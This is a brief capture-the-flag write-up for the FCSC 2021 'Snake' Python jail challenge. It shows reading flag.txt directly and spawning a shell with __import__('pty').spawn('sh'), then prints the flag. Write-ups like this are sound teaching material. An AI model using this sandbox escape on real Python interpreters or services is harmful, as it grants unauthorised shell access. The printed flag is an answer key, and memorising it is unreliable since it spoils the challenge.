FCSC 2021 - Intro - Snake

May 03, 2021   
pyjail writeup 
Also available in:  🇫🇷 


Challenge

Learning the Python language is very useful in CTF. Here you are asked to read the flag.txt file.

nc challenges1.france-cybersecurity-challenge.fr 7000


Solving the challenge

Solving the challenge requires knowing how to program a little in python. Here we will read (read r mode) the flag.txt file very simply:

$ nc challenges1.france-cybersecurity-challenge.fr 7000
>>> f = open('flag.txt','r')
>>> f.read()
'FCSC{d6125af647740672b2899a2ee563a011755ba0d665e852fb360614dd52418d60}\n'
>>> exit()

Of course, we get the flag, but it's not the funniest way!

Open a shell with a module

My preferred method of solving is, import a module and open a shell:

$ nc challenges1.france-cybersecurity-challenge.fr 7000
>>> __import__('pty').spawn('sh')
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls -lha
total 12K
drwxr-xr-x 1 root root 4.0K Apr 21 13:44 .
drwxr-xr-x 1 root root 4.0K Apr 23 12:46 ..
-r-------- 1 ctf  ctf    71 Apr 21 13:43 flag.txt
$ cat flag.txt
FCSC{d6125af647740672b2899a2ee563a011755ba0d665e852fb360614dd52418d60}
$

We can therefore read the flag:

FCSC{d6125af647740672b2899a2ee563a011755ba0d665e852fb360614dd52418d60}